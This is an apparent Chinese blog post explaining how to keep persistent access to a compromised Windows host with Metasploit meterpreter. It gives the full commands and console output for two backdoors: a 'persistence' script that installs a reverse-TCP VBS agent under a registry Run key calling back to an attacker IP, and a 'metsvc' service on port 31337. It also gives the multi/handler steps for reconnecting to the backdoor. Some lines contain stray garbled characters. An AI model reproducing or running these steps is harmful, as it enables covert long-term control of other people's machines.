meterpreter 如何留后门,使攻击持久化

安装后门方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108


Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

^9 b5 q" j
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件上面的vbs的确存在


  注释,反弹时间间隔是5s  端口是443 Metasploit服务器Ip是192.168.0.108,缺点是容易被杀毒软件查杀|9 y$ t
3 X' c  d)W  l$ s
安装后门方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...

>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后门如何利用啊?
   msf > use exploit/multi/handler
   msf  exploit(handler) > set payload windows/metsvc_bind_tcp
   msf  exploit(handler) > set LPORT 31337
   msf  exploit(handler) > set RHOST 192.168.200.140

msf  exploit(handler)> exploit

posted @ 2018-07-31 09:01  桃花雪  阅读(2778)  评论(0编辑  收藏  举报